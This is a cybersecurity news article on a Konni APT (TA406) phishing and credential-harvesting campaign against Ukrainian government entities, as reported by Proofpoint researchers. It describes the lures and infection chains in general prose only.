The North Korean cyber espionage group known as Konni APT has recently initiated a phishing campaign targeting Ukrainian government entities. This development signifies an expansion of the group’s operations beyond its traditional focus on Russia.
According to enterprise security firm Proofpoint, the primary objective of this campaign is to gather intelligence on the progression of Russia’s invasion of Ukraine. Security researchers Greg Lesnewich, Saher Naumaan, and Mark Kelly noted that Konni APT’s interest in Ukraine aligns with its historical pattern of targeting government entities in Russia for strategic intelligence purposes.
Konni APT, also referred to as Opal Sleet, Osmium, TA406, and Vedalia, has been active since at least 2014. The group has a history of targeting entities in South Korea, the United States, and Russia. Their attack strategies often involve phishing emails designed to distribute malware known as Konni RAT (also called UpDog) and to redirect recipients to credential harvesting pages. In a November 2021 analysis, Proofpoint assessed TA406 as one of several actors associated with activities publicly tracked under the names Kimsuky, Thallium, and Konni Group.
In the latest campaign, Konni APT employed phishing emails that impersonated a fictitious senior fellow at a non-existent think tank called the Royal Institute of Strategic Studies. These emails contained links to password-protected RAR archives hosted on the MEGA cloud service. Upon opening the RAR archive using the password provided in the email, the infection sequence commenced, leading to extensive reconnaissance of the compromised systems.
The RAR archive included a Compiled HTML Help (CHM) file displaying decoy content related to former Ukrainian military leader Valeriy Zaluzhnyi. If the recipient clicked anywhere on the page, an embedded PowerShell command executed, reaching out to an external server to download a subsequent PowerShell payload. This payload was capable of executing various commands to gather system information, encode it using Base64, and transmit it back to the same server.
The attackers demonstrated persistence by sending multiple phishing emails on consecutive days when the initial emails did not elicit a response. They followed up with messages inquiring if the target had received the prior emails and encouraged them to download the files.
In another variation of the attack, Konni APT distributed an HTML file directly as an attachment in the phishing emails. Victims were instructed to click on an embedded link within the HTML file, leading to the download of a ZIP archive containing a benign PDF and a Windows shortcut (LNK) file. Executing the LNK file triggered a Base64-encoded PowerShell script that dropped a JavaScript Encoded file named Themes.jse using a Visual Basic Script. This JSE malware contacted an attacker-controlled URL and executed the server’s response via PowerShell. The exact nature of the final payload remains unknown.
Additionally, TA406 attempted to harvest credentials by sending fake Microsoft security alert messages to Ukrainian government entities from ProtonMail accounts. These messages warned of suspicious sign-in activity from IP addresses located in the United States and urged recipients to verify the login by visiting a provided link. While the credential harvesting page has not been recovered, the same compromised domain has been used in the past to collect Naver login information.
These credential harvesting campaigns occurred prior to the phishing attacks, indicating a coordinated effort to compromise Ukrainian government entities. The Konni APT’s activities underscore the evolving nature of cyber threats and the importance of vigilance against sophisticated phishing campaigns.
